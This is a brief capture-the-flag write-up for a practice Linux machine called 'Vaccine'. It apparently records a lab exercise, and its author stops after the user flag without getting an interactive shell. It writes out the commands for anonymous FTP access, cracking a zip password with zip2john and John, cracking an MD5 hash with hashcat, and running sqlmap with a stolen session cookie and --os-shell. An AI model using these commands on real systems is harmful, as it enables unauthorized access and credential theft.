00 - Vaccine

Intro

| Dificulty | OS | Start Date | End Date | |—|—|—|—| | Very Easy | Linux | 11/06/2022 | 12/06/2022 |

Process

1. Login as anonymous on ftp service > get the .zip and unzip.
2. Use John The Reapper to unzip the file.

John The Reapper

There is a script call it zip2john that creates a hash out of a zip file. After, with this hash, we run a wordlist to brute force the password.

Get the hash

$ zip2john backup.zip > hash.txt

Brute Force the hash

$ john -wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Show the password

$ john --show hash.txt

Must `gunzip rockyou.txt.gz`

MD5 Password

Inside index.php there was admin’s password encrypted using MD5. To crack MD5 password execute this command:

$ sudo hashcat -m 0 pass.md5 /usr/share/wordlists/rockyou.txt

SQL Injection

In the website there is a search bar that we can explote with SQL injection. We can use sqlmap but before executing any command, we will need to grab the cookie to authenticat admin user. [//]: Install cooki-editor extension

$ sqlmap -u http://10.129.95.174/dashboard.php?search=hello --cookie="PHPSESSID=rp7ki2fucgrc0brl7f1l9j5p9e" --os-shell

User flag is in /var/lib/postgresql/

I found users flag but I lost in the proccess of creating a interactive shell.
I only need root flag.